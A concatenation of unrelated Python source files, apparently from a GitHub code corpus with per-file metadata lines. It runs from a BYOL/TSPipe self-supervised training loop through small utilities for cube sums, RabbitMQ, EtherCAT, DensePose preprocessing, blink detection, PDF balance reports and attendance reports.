for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)
@staticmethod
def regression_loss(x, y):
x = F.normalize(x, dim=1)
y = F.normalize(y, dim=1)
return 2 - 2 * (x * y).sum(dim=-1)
def initializes_target_network(self):
# init momentum network as encoder net
for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
param_k.data.copy_(param_q.data) # initialize
param_k.requires_grad = False # not update by gradient
def train(self, train_dataset):
train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers, drop_last=False, shuffle=True, pin_memory=True)
niter = 0
model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
self.initializes_target_network()
batch_id = 0
for epoch_counter in range(self.max_epochs):
if self.dummy_input:
dummy_input_gen = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
pbar = tqdm(dummy_input_gen)
else:
pbar = tqdm(train_loader)
for (batch_view_1, batch_view_2), _ in pbar:
batch_id += 1
profile_semantic(niter, 0, 0, False, None, 0, 'copy')
batch_view_1 = batch_view_1.to(self.device)
profile_semantic(niter, 0, 0, False, None, 0, 'copy_finish')
profile_semantic(niter, 1, 0, False, None, 0, 'copy')
batch_view_2 = batch_view_2.to(self.device)
profile_semantic(niter, 1, 0, False, None, 0, 'copy_finish')
if niter == 0:
grid = torchvision.utils.make_grid(batch_view_1[:32])
self.writer.add_image('views_1', grid, global_step=niter)
grid = torchvision.utils.make_grid(batch_view_2[:32])
self.writer.add_image('views_2', grid, global_step=niter)
loss = self.update(batch_view_1, batch_view_2, niter)
self.writer.add_scalar('loss', loss, global_step=niter)
# torch.cuda.nvtx.range_push("BackwardCompute")
profile_semantic(niter, 0, 0, False, None, 0, 'backward')
self.optimizer.zero_grad()
loss.backward()
profile_semantic(niter, 0, 0, False, None, 0, 'backward_finish')
profile_semantic(niter, 0, 0, False, None, 0, 'optimize')
self.optimizer.step()
# torch.cuda.nvtx.range_pop()
self._update_target_network_parameters() # update the key encoder
profile_semantic(niter, 0, 0, False, None, 0, 'optimize_finish')
pbar.set_postfix({'loss': loss, 'batch_id': batch_id})
niter += 1
if batch_id % 100 == 0:
self.save_model(os.path.join(model_checkpoints_folder, f'model_batch{batch_id}_part0.pt'))
if batch_id > 1:
loss_fn = torch.nn.MSELoss(reduction='sum')
print("End of epoch {}".format(epoch_counter))
if self.scheduler is not None:
self.scheduler.step()
# save checkpoints
self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))
def update(self, batch_view_1, batch_view_2, niter = 0):
# compute query feature
profile_semantic(niter, 0, 0, False, None, 0, 'compute')
predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
profile_semantic(niter, 0, 0, False, None, 0, 'compute_finish')
profile_semantic(niter, 1, 0, False, None, 0, 'compute')
predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
profile_semantic(niter, 1, 0, False, None, 0, 'compute_finish')
# compute key features
with torch.no_grad():
profile_semantic(niter, 0, 0, True, None, 0, 'compute')
targets_to_view_2 = self.target_network(batch_view_1)
profile_semantic(niter, 0, 0, True, None, 0, 'compute_finish')
profile_semantic(niter, 1, 0, True, None, 0, 'compute')
targets_to_view_1 = self.target_network(batch_view_2)
profile_semantic(niter, 1, 0, True, None, 0, 'compute_finish')
profile_semantic(niter, 0, 0, False, None, 0, 'loss')
loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
profile_semantic(niter, 0, 0, False, None, 0, 'loss')
return loss.mean()
def save_model(self, PATH):
torch.save({
'online_network_state_dict': self.online_network.state_dict(),
'target_network_state_dict': self.target_network.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
}, PATH)
class DummyBYOLTrainer(BYOLTrainer):
def train(self, train_dataset):
train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers, drop_last=False, shuffle=True)
self.initializes_target_network()
for epoch_counter in range(self.max_epochs):
pbar = tqdm(train_loader)
for (batch_view_1, batch_view_2), _ in pbar:
# do nothing
pass
print("End of epoch {}".format(epoch_counter))
class TSPipeBYOLTrainer(BYOLTrainer):
def __init__(self, online_network, target_network, predictor, optimizer: torch.optim.Optimizer, device, scheduler, **params):
super().__init__(online_network, target_network, predictor, optimizer, device, scheduler, **params)
self.optimizer = optimizer
self.online_network = online_network
self.target_network = target_network
self.predictor_network = predictor
self.dummy_input = True if params['dummy_input'] == True else False
self.image_x = eval(params['input_shape'])[0]
self.scheduler = scheduler
self.params = params
if self.dummy_input:
print("Warning: Dummy Input Enabled.")
@staticmethod
def contrastive_loss(online_view_1, online_view_2, target_view_1, target_view_2, args: Namespace, extra_args: Namespace):
loss = TSPipeBYOLTrainer.regression_loss(online_view_1, target_view_2)
loss += TSPipeBYOLTrainer.regression_loss(online_view_2, target_view_1)
return loss.mean()
@staticmethod
def calculate_target_network_parameters(m, online_new_param, target_param:Optional[Iterable[Parameter]] = None):
"""
Momentum update of the key encoder
"""
@torch.no_grad()
def calc():
result = []
for param_q, param_k in zip(online_new_param, target_param):
detached = param_k.clone().detach()
detached = detached * m + param_q.data * (1. - m)
result.append(detached)
return result
return calc()
def train(self, train_dataset):
model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
self.initializes_target_network()
initial_lr = self.optimizer.param_groups[0]['lr']
print(f"initial_lr : {initial_lr}")
initial_momentum = self.params['m']
print(f"initial_momentum : {initial_momentum}")
warmup_epochs = 10
lr = self.adjust_learning_rate(1, warmup_epochs = warmup_epochs, initial_lr = initial_lr)
m = self.adjust_moco_momentum(0, initial_momentum)
self.tspipe = TSPipe(self.online_network,
self.target_network,
self.predictor_network,
self.optimizer,
TSPipeBYOLTrainer.contrastive_loss,
TSPipeBYOLTrainer.calculate_target_network_parameters,
self.m,
model_checkpoints_folder
)
if self.tspipe.is_primary:
# prepare dataloader
if self.dummy_input:
train_loader = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
else:
train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers, drop_last=False, shuffle=True, pin_memory=False)
iters_per_epoch = len(train_loader)
print(f"iters_per_epoch : {iters_per_epoch}")
niter = 0
for epoch_counter in range(self.max_epochs):
pbar = tqdm(train_loader)
for (batch_view_1, batch_view_2), _ in pbar:
if niter == 0:
grid = torchvision.utils.make_grid(batch_view_1[:32])
self.writer.add_image('views_1', grid, global_step=niter)
grid = torchvision.utils.make_grid(batch_view_2[:32])
self.writer.add_image('views_2', grid, global_step=niter)
loss = self.tspipe.feed(batch_view_1.share_memory_(), batch_view_2.share_memory_())
if loss is not None:
self.writer.add_scalar('loss', loss, global_step=niter)
pbar.set_postfix({'loss': loss, 'batch_id': niter})
niter += 1
print("End of epoch {}".format(epoch_counter))
self.tspipe.feed_epoch()
lr = self.adjust_learning_rate(epoch_counter+1, warmup_epochs = warmup_epochs, initial_lr = initial_lr)
m = self.adjust_moco_momentum(epoch_counter, initial_momentum)
self.tspipe.update_lr(lr)
self.tspipe.update_momentum(m)
self.writer.add_scalar('learning_rate', lr, global_step=niter)
self.writer.add_scalar('momentum', m, global_step=niter)
self.tspipe.stop()
# save checkpoints
print("Saving checkpoints...")
self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))
print("Saving checkpoints OK")
def adjust_learning_rate(self, epoch, warmup_epochs, initial_lr):
"""Decays the learning rate with half-cycle cosine after warmup"""
if epoch < warmup_epochs:
lr = initial_lr * epoch / warmup_epochs
else:
lr = initial_lr * 0.5 * (1. + math.cos(math.pi * (epoch - warmup_epochs) / (self.params['max_epochs'] - warmup_epochs)))
for param_group in self.optimizer.param_groups:
param_group['lr'] = lr
return lr
def adjust_moco_momentum(self, epoch, initial_momentum):
"""Adjust moco momentum based on current epoch"""
m = 1. - 0.5 * (1. + math.cos(math.pi * epoch / self.params['max_epochs'])) * (1. - initial_momentum)
return m
def update(self, batch_view_1, batch_view_2):
# compute query feature
predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
# compute key features
with torch.no_grad():
targets_to_view_2 = self.target_network(batch_view_1)
targets_to_view_1 = self.target_network(batch_view_2)
loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
return loss.mean() | kaist-ina/TSPipe | benchmarks/byol/trainer.py | trainer.py | py | 13,650 | python | en | code | 6 | github-code | 36 |
30631149331 | """Python Program for cube sum of first n natural numbers
Print the sum of series 13 + 23 + 33 + 43 + …….+ n3 till n-th term.
Examples:
Input : n = 5
Output : 225
13 + 23 + 33 + 43 + 53 = 225
Input : n = 7
Output : 784
13 + 23 + 33 + 43 + 53 +
63 + 73 = 784"""
# #program1
# n = int(input("Enter the N: "))
# def SumOfCubes(n):
# sum = 0
# for i in range(1,n+1):
# sum = sum +(i*i*i)
# return sum
# print(SumOfCubes(n))
#program2
"""Time Complexity : O(n)
An efficient solution
is to use direct mathematical formula which is (n ( n + 1 ) / 2) ^ 2
For n = 5 sum by formula is
(5*(5 + 1 ) / 2)) ^ 2
= (5*6/2) ^ 2
= (15) ^ 2
= 225
For n = 7, sum by formula is
(7*(7 + 1 ) / 2)) ^ 2
= (7*8/2) ^ 2
= (28) ^ 2
= 784"""
#
# n = int(input("Enter the number to find the sum of cubes: "))
# def SumOfCubes(n):
# return (n*(n+1)//2)**2
# print(SumOfCubes(n))
#Program3
"""e can prove the formula using mathematical induction.
We can easily see that the formula holds true for n = 1 and n = 2. Let this be true for n = k-1.
Let the formula
be true for n = k-1.
Sum of first
(k-1) natural numbers = [((k - 1) * k)/2]2
Sum of first k natural numbers =
= Sum of (k-1) numbers + k3
= [((k - 1) * k)/2]2 + k3
= [k2(k2 - 2k + 1) + 4k3]/4
= [k4 + 2k3 + k2]/4
= k2(k2 + 2k + 1)/4
= [k*(k+1)/2]2
The above program causes overflow,
even if result is not beyond integer limit.
Like previous post,
we can avoid overflow upto some extent by doing division first.
"""
# Efficient Python program to find sum of cubes
# of first n natural numbers that avoids
# overflow if result is going to be withing
# limits.
# Returns the sum of series
def sumOfSeries(n):
x = 0
if n % 2 == 0 :
x = (n/2) * (n+1)
else:
x = ((n + 1) / 2) * n
return (int)(x * x)
# Driver Function
n = 5
print(sumOfSeries(n))
| nishanthhollar/geeksforgeeks_python_basic_programs | basic_programs/cube_of_squares_of_natural_nos.py | cube_of_squares_of_natural_nos.py | py | 2,091 | python | en | code | 0 | github-code | 36 |
20528044643 | import pika
connection = pika.BlockingConnection( #建立连接
pika.ConnectionParameters(host='localhost')
)
channel = connection.channel() #声明一个管道
#声明QUEUE
channel.queue_declare(queue='hello2',durable=True)
channel.basic_publish(exchange='',
routing_key='hello2',
body='Hello World!',
properties=pika.BasicProperties(delivery_mode=2,
)
)
#routing_key queue名字
#body 消息
print(" [x] Sent 'Hello World!3'")
connection.close() #关闭连接 | chenyaqiao0505/Code111 | RabbitMQ/producter.py | producter.py | py | 572 | python | en | code | 0 | github-code | 36 |
26896963958 | #!/usr/bin/env python3
import sys
import time
import socket
import yaml
from dataclasses import asdict
import ipywidgets.widgets as widgets
from IPython.display import display
print(sys.executable)
from ecat_repl import ZmsgIO
from ecat_repl import FoeMaster
from ecat_repl import CtrlCmd
from ecat_repl import SdoCmd
from ecat_repl import SdoInfo
from ecat_repl import (
master_cmd_stop,
master_cmd_start,
master_cmd_get_slave_descr,
#
flash_cmd_load_default,
flash_cmd_save_flash,
flash_cmd_load_flash,
#
ctrl_cmd_start,
ctrl_cmd_stop,
ctrl_cmd_fan,
ctrl_cmd_led,
ctrl_cmd_run_torque_calib,
ctrl_cmd_set_home,
ctrl_cmd_set_zero,
ctrl_cmd_set_min_pos,
ctrl_cmd_set_max_pos,
ctrl_cmd_set_position,
ctrl_cmd_set_velocity,
ctrl_cmd_set_torque,
ctrl_cmd_set_current,
ctrl_cmd_dac_tune,
ctrl_cmd_get_adc,
ctrl_cmd_set_dac,
ctrl_cmd_test_done,
ctrl_cmd_test_error,
)
uri = "localhost:5555"
io = ZmsgIO(uri)
io.debug = False
scan_ids = []
io.doit(master_cmd_stop)
io.doit(master_cmd_start.set_args({'app_mode':'config_mode','use_ecat_pos_as_id':'true'}))
reply = io.doit(master_cmd_get_slave_descr)
yaml_msg = yaml.safe_load(reply['msg'])
scan_ids = yaml_msg.keys()
ids=list(scan_ids)
print(ids)
reply = io.doit(SdoInfo(u'SDO_NAME').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_names = yaml_msg
print(sdo_names)
reply = io.doit(SdoInfo(u'SDO_OBJD').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_infos = yaml_msg
print(sdo_infos)
for i in range(100):
reply = io.doit(SdoCmd(rd_sdo=sdo_names,wr_sdo={}).set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
print(yaml_msg)
time.sleep(0.1)
#io.doit(SdoCmd(rd_sdo=['fw_ver'],wr_sdo={'board_id': 101}).set_bid(ids[0]))
#io.doit(flash_cmd_save_flash.set_bid(ids[0])) | alessiomargan/Ecat-repl | ecat_repl/test/ecat_advr.py | ecat_advr.py | py | 1,873 | python | en | code | 0 | github-code | 36 |
37417551271 | import os
from os.path import join
import sys
import json
import numpy as np
# from .read_openpose import read_openpose
import utils.segms as segm_utils
def db_coco_extract(dataset_path, subset, out_path):
# convert joints to global order
joints_idx = [19, 20, 21, 22, 23, 9, 8, 10, 7, 11, 6, 3, 2, 4, 1, 5, 0]
# bbox expansion factor
scaleFactor = 1.2
# structs we need
imgnames_, scales_, centers_, parts_, smpl_2dkps_, dp_annot_ = [], [], [], [], [], []
im_id_, id_ = [], []
# subfolders for different subsets
subfolders = {'train': 'train2014', 'minival': 'val2014', 'valminusminival': 'val2014', 'test': 'test2014'}
# json annotation file
json_path = os.path.join(dataset_path,
'annotations',
'densepose_coco_2014_{}.json'.format(subset))
json_data = json.load(open(json_path, 'r'))
imgs = {}
for img in json_data['images']:
imgs[img['id']] = img
has_dp_count = 0
no_dp_count = 0
for annot in json_data['annotations']:
im_id, id = annot['image_id'], annot['id']
if 'dp_masks' not in annot.keys():
# print('dp_masks not in annot')
no_dp_count += 1
continue
# keypoints processing
keypoints = annot['keypoints']
keypoints = np.reshape(keypoints, (17, 3))
keypoints[keypoints[:, 2] > 0, 2] = 1
# if sum(keypoints[5:, 2] > 0) < 12:
# no_dp_count += 1
# continue
has_dp_count += 1
# check if all major body joints are annotated
# if sum(keypoints[5:,2]>0) < 12:
# continue
# create smpl joints from coco keypoints
smpl_2dkp = kp_coco2smpl(keypoints.copy())
# image name
image_id = annot['image_id']
img_name = str(imgs[image_id]['file_name'])
img_name_full = join(subfolders[subset], img_name)
# keypoints
part = np.zeros([24, 3])
part[joints_idx] = keypoints
# scale and center
bbox = annot['bbox']
center = [bbox[0] + bbox[2]/2, bbox[1] + bbox[3]/2]
scale = scaleFactor*max(bbox[2], bbox[3])/200
dp_annot = {'bbox': annot['bbox'],
'dp_x': annot['dp_x'],
'dp_y': annot['dp_y'],
'dp_I': annot['dp_I'],
'dp_U': annot['dp_U'],
'dp_V': annot['dp_V'],
'dp_masks': annot['dp_masks']
}
# store data
imgnames_.append(img_name_full)
centers_.append(center)
scales_.append(scale)
parts_.append(part)
smpl_2dkps_.append(smpl_2dkp)
dp_annot_.append(dp_annot)
im_id_.append(im_id)
id_.append(id)
print('# samples with dp: {}; # samples without dp: {}'.format(has_dp_count, no_dp_count))
# store the data struct
if not os.path.isdir(out_path):
os.makedirs(out_path)
out_file = os.path.join(out_path, 'dp_coco_2014_{}.npz'.format(subset))
np.savez(out_file, imgname=imgnames_,
center=centers_,
scale=scales_,
part=parts_,
smpl_2dkps=smpl_2dkps_,
dp_annot=dp_annot_,
im_id=im_id_,
id=id_)
def kp_coco2smpl(kps_coco):
smpl2coco = [[1, 2, 4, 5, 7, 8, 16, 17, 18, 19, 20, 21],
[11, 12, 13, 14, 15, 16, 5, 6, 7, 8, 9, 10]]
kps_smpl = np.zeros((24, 4))
kps_smpl[smpl2coco[0], :2] = kps_coco[smpl2coco[1], :2]
kps_smpl[smpl2coco[0], 3] = kps_coco[smpl2coco[1], 2] / 2.
if all(kps_coco[[11, 12], 2] > 0):
kps_smpl[0, :2] = np.mean(kps_coco[[11, 12], :2], axis=0)
kps_smpl[0, 3] = 0.5
if all(kps_coco[[5, 6], 2] > 0):
kps_smpl[12, :2] = np.mean(kps_coco[[5, 6], :2], axis=0)
kps_smpl[12, 3] = 0.5
if kps_smpl[12, 3] > 0 and kps_coco[0, 2] > 0:
kps_smpl[15, :2] = (kps_smpl[12, :2] + kps_coco[0, :2]) / 2.
kps_smpl[15, 3] = 0.5
if kps_smpl[0, 3] > 0 and kps_smpl[12, 3] > 0:
kps_smpl[6, :2] = np.mean(kps_smpl[[0, 12], :2], axis=0)
kps_smpl[9, :2] = kps_smpl[6, :2]
kps_smpl[6, 3] = 0.5
kps_smpl[9, 3] = 0.5
if kps_smpl[0, 3] > 0 and kps_smpl[6, 3] > 0:
kps_smpl[3, :2] = np.mean(kps_smpl[[0, 6], :2], axis=0)
kps_smpl[3, 3] = 0.5
if kps_smpl[9, 3] > 0 and kps_smpl[16, 3] > 0:
kps_smpl[13, :2] = np.mean(kps_smpl[[9, 16], :2], axis=0)
kps_smpl[13, 3] = 0.5
if kps_smpl[9, 3] > 0 and kps_smpl[17, 3] > 0:
kps_smpl[14, :2] = np.mean(kps_smpl[[9, 17], :2], axis=0)
kps_smpl[14, 3] = 0.5
hand_foot = [[7, 8, 20, 21], [10, 11, 22, 23]]
for i in range(4):
if kps_smpl[hand_foot[0][i], 3] > 0:
kps_smpl[hand_foot[1][i], :2] = kps_smpl[hand_foot[0][i], :2]
kps_smpl[hand_foot[1][i], 3] = 0.5
kps_smpl[:, 2] = kps_smpl[:, 3]
return kps_smpl[:, :3].copy()
if __name__ == '__main__':
import path_config as cfg
db_coco_extract(cfg.COCO_ROOT, 'train', 'notebooks/output/extras')
# db_coco_extract(cfg.COCO_ROOT, 'minival', 'notebooks/output/extras')
| HongwenZhang/DaNet-DensePose2SMPL | datasets/preprocess/dp_coco.py | dp_coco.py | py | 5,303 | python | en | code | 208 | github-code | 36 |
3829108374 | # coding: utf-8
# 前端测试是否眨眼,用于活体检测 Front-end test blinks for biopsy
from scipy.spatial import distance as dist
from imutils import face_utils
import time
import dlib
import cv2
def eye_aspect_ratio(eye):
# 计算两只眼睛之间的垂直欧式距离
A = dist.euclidean(eye[1], eye[5])
B = dist.euclidean(eye[2], eye[4])
# 计算两眼之间的水平欧式距离
C = dist.euclidean(eye[0], eye[3])
# 计算眼睛纵横比
ear = (A + B) / (2.0 * C)
# return the eye aspect ratio
return ear
def main():
shape_predictor = "shape_predictor_68_face_landmarks.dat"
EYE_AR_THRESH = 0.27 # 阈值
EYE_AR_CONSEC_FRAMES = 33 # the number of consecutive frames the eye must be below the threshold
# initialize the frame counters and the total number of blinks
COUNTER = 0
TOTAL = 0
# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor
print("[INFO] loading facial landmark predictor...")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(shape_predictor)
# grab the indexes of the facial landmarks for the left and right eye, respectively
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
# start the video stream thread
print("[INFO] starting video stream thread...")
print("[INFO] print q to quit...")
vs = cv2.VideoCapture(1)
time.sleep(1.0)
# loop over frames from the video stream
while True:
# grab the frame from the threaded video file stream, resize it, and convert it to grayscale channels)
_, frame = vs.read()
frame = cv2.resize(frame, (0, 0), fx=0.75,fy=0.75)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# detect faces in the grayscale frame
rects = detector(gray, 0)
# loop over the face detections
for rect in rects:
# determine the facial landmarks for the face region, then
# convert the facial landmark (x, y)-coordinates to a NumPy array
shape = predictor(gray, rect)
shape = face_utils.shape_to_np(shape)
# extract the left and right eye coordinates, then use the
# coordinates to compute the eye aspect ratio for both eyes
leftEye = shape[lStart:lEnd]
rightEye = shape[rStart:rEnd]
leftEAR = eye_aspect_ratio(leftEye)
rightEAR = eye_aspect_ratio(rightEye)
# average the eye aspect ratio together for both eyes
ear = (leftEAR + rightEAR) / 2.0
# compute the convex hull for the left and right eye, then visualize each of the eyes
leftEyeHull = cv2.convexHull(leftEye)
rightEyeHull = cv2.convexHull(rightEye)
cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
# check to see if the eye aspect ratio is below the blink
# threshold, and if so, increment the blink frame counter
if ear < EYE_AR_THRESH:
COUNTER += 1
# otherwise, the eye aspect ratio is not below the blink threshold
else:
# if the eyes were closed for a sufficient number of then increment the total number of blinks
if COUNTER >= EYE_AR_CONSEC_FRAMES:
return 1
# reset the eye frame counter
COUNTER = 0
# draw the total number of blinks on the frame along with the computed eye aspect ratio for the frame
cv2.putText(frame, "Blinks: {}".format(TOTAL), (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.putText(frame, "EAR: {:.2f}".format(ear), (300, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
| HollowMan6/Lanck-Face-Recognition-Lock-Competition-Backend-Code | Development-Board/DetectBlinks.py | DetectBlinks.py | py | 4,286 | python | en | code | 22 | github-code | 36 |
41165135533 | # -*- coding: utf-8 -*-
'''
This file is part of Habitam.
Habitam is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
Habitam is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public
License along with Habitam. If not, see
<http://www.gnu.org/licenses/>.
Created on Jul 21, 2013
@author: Stefan Guna
'''
from habitam.downloads.common import habitam_brand, signatures, MARGIN
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4, landscape
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import cm
from reportlab.platypus.doctemplate import SimpleDocTemplate
from reportlab.platypus.flowables import Spacer
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.tables import Table, TableStyle
import logging
import tempfile
logger = logging.getLogger(__name__)
__HEIGHT__ = A4[0]
__WIDTH__ = A4[1]
def __assets(building, day):
result = {}
# sold in casa si in banca
for mt in ['cash', 'bank']:
is_mt = lambda ac: ac.money_type == mt and ac.type == 'std'
result[mt] = building.balance_by_type(is_mt, day)
aps = building.apartments()
ap_pending = 0
penalties_pending = 0
for ap in aps:
ap_pending = ap_pending + ap.balance(day)
tmp = ap.penalties(day)
if tmp != None:
penalties_pending = penalties_pending + ap.penalties(day)
# lista curenta
result['apartment_pending'] = ap_pending * -1
# restante ale locatarilor
result['penalties_pending'] = penalties_pending * -1
# facturi de la furnizori si prestatori care urmeaza a fi repartizate pe liste.
# everything is automatically distributed to the list
result['outstanding_invoices'] = 0
return result
def __liabilities(building, day):
result = {}
# fond rulment
# fond de reparatii
# fond de penalizari
# fonduri speciale
# facturi de la terti
for t in ['rulment', 'repairs', 'penalties', 'special', '3rd party']:
is_t = lambda ac:ac.type == t
result[t] = building.balance_by_type(is_t, day)
return result
def __balance_format(canvas, doc):
canvas.saveState()
canvas.setFontSize(16)
t = u'Situația soldurilor elementelor de activ și pasiv pentru %s la %s'
canvas.drawCentredString(__WIDTH__ / 2.0, __HEIGHT__ - 100,
t % (doc.habitam_data['building'].name, doc.habitam_data['day']))
habitam_brand(canvas, __WIDTH__, __HEIGHT__)
canvas.restoreState()
def __format_data(data):
styles = getSampleStyleSheet()
assets = data['assets']
liabilities = data['liabilities']
d = [['NR.\nCRT.', 'ELEMENTE DE ACTIV', 'VALORI\n(LEI)', 'ELEMENTE DE PASIV', 'VALORI\n(LEI)'],
['1.', Paragraph(u'Sold în casă', styles['Normal']), assets['cash'], Paragraph('Sold fond de rulment', styles['Normal']), liabilities['rulment']],
['2.', Paragraph(u'Sold conturi la bănci', styles['Normal']), assets['bank'], Paragraph(u'Sold fond de reparații', styles['Normal']), liabilities['repairs']],
['3.', Paragraph(u'Sume neachitate de proprietarii din asociație pentru lista de plată curentă', styles['Normal']), assets['apartment_pending'], Paragraph('Sold fond sume speciale', styles['Normal']), liabilities['special']],
['4.', Paragraph(u'Restanțe existente la data întocmirii acestei situații', styles['Normal']), assets['penalties_pending'], Paragraph('Soldul altor fonduri legal stabilite', styles['Normal']), '0'],
['5.', Paragraph(u'Debitori, alții decât mebrii asociației', styles['Normal']), '0', Paragraph('Furnizori pentru facturi neachitate', styles['Normal']), '0'],
['6.', Paragraph(u'Acte de plată pe luna în curs, nerepartizate proprietarilor', styles['Normal']), assets['outstanding_invoices'], Paragraph(u'Creditori diverși', styles['Normal']), liabilities['3rd party']],
['7.', Paragraph(u'Acte de plăți pentru cheltuielile aferente fondurilor de reparații, speciale, de penalizări care nu au fost încă scăzute din fondurile respective', styles['Normal']), '0', '', ''],
['', Paragraph(u'TOTAL PARTEA I', styles['Normal']), sum(assets.values()), Paragraph(u'TOTAL PARTEA II', styles['Normal']), sum(liabilities.values())]
]
table = Table(d, colWidths=[1.3 * cm, 7 * cm, 4 * cm, 7 * cm, 4 * cm])
table.setStyle(TableStyle([
('FONT', (0, 0), (-1, 0), 'Helvetica-Bold'),
('ALIGN', (0, 0), (-1, 0), 'CENTER'),
('VALIGN', (0, 0), (-1, 0), 'MIDDLE'),
('ALIGN', (0, 0), (0, -1), 'CENTER'),
('VALIGN', (0, 0), (0, -1), 'MIDDLE'),
('ALIGN', (2, 0), (2, -1), 'CENTER'),
('VALIGN', (2, 0), (2, -1), 'MIDDLE'),
('ALIGN', (4, 0), (4, -1), 'CENTER'),
('VALIGN', (4, 0), (4, -1), 'MIDDLE'),
('INNERGRID', (0, 0), (-1, -1), 0.25, colors.black),
('BOX', (0, 0), (-1, -1), 0.25, colors.black)
]))
return table
def __to_pdf(temp, data):
doc = SimpleDocTemplate(temp, pagesize=landscape(A4), leftMargin=MARGIN,
rightMargin=MARGIN, topMargin=MARGIN,
bottomMargin=MARGIN,
title=u'Situația activ/pasiv pentru %s' % data['building'].name,
author='www.habitam.ro')
flowables = [Spacer(1, 6 * cm), __format_data(data), Spacer(1, cm), signatures()]
doc.habitam_data = data
doc.build(flowables, onFirstPage=__balance_format, onLaterPages=__balance_format)
def download_balance(building, day):
data = {'building': building, 'day': day,
'assets': __assets(building, day),
'liabilities': __liabilities(building, day)}
logger.debug('Balance is %s' % data)
temp = tempfile.NamedTemporaryFile()
__to_pdf(temp, data)
return temp
| habitam/habitam-core | habitam/downloads/balance.py | balance.py | py | 6,509 | python | en | code | 1 | github-code | 36 |
35778628261 | from report import report_sxw
from osv import osv
import pooler
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
from tools.translate import _
class report_attendance_parser(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(report_attendance_parser, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'get_employee':self._get_employee,
'get_work_time':self._get_work_time,
})
def _get_employee(self,employee_ids):
if employee_ids:
return self.pool.get('hr.employee').browse(self.cr,self.uid,employee_ids)
else:
return False
def _get_work_time(self,employee_id,date_print):
sign_in='%s 00:00:00'%date_print
sign_out='%s 23:59:59'%date_print
if employee_id:
employee=[]
attendance_ids=self.pool.get('hr.attendance').search(self.cr,self.uid,[('employee_id','=',employee_id),('name','>=',sign_in),('name','<=',sign_out)],order="employee_id,name ASC")
#print 'attendance_ids==================',attendance_ids
attendance_datas=self.pool.get('hr.attendance').browse(self.cr,self.uid,attendance_ids)
dummy={
'sign_in': False,
'sign_out':False,
}
for y in attendance_datas:
dummy={
'sign_in':dummy['sign_in']==False and y.action == 'sign_in' and y.name,
'sign_out':dummy['sign_out']==False and y.action == 'sign_out' and y.name,
}
#print "===========>",dummy
if dummy['sign_in'] and dummy['sign_out']:
employee.append(dummy)
dummy={
'sign_in': False,
'sign_out':False,
}
return employee
else:
return False
report_sxw.report_sxw('report.report.hr.attendance', 'hr.attendance.report.wizard', 'addons/ad_hr_report/report/attendance_report.mako', parser = report_attendance_parser, header = True)
| aryaadiputra/addons60_ptgbu_2013 | ad_hr_report/report/attendance_report_parser_old.py | attendance_report_parser_old.py | py | 2,235 | python | en | code | 0 | github-code | 36 |
7158973131 | import os
import shutil
from pathlib import Path
from os import system
from shutil import rmtree
import shutil
mi_ruta = Path(Path.home(), '\Programacion-Cursos-Desarrollador\Python\Python-proyecto1\Dia7\Banco')
class Persona:
def __init__(self, nombre, apellido):
self.nombre = nombre
self.apellido = apellido
class Cliente(Persona):
def __init__(self, nombre, apellido, numero_cuenta, balance = 0):
super().__init__(nombre, apellido) # heredado de class Persona
self.numero_cuenta = numero_cuenta
self.balance = balance
ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
BalanceCuentaLeer = open(ruta_balance)
contenidoBalanceCuentaLeer = BalanceCuentaLeer.read()
# print("Prueba balance print: ", contenidoBalanceCuentaLeer)
# print("Tipo de dato: ", type(contenidoBalanceCuentaLeer))
balance_int = int(contenidoBalanceCuentaLeer)
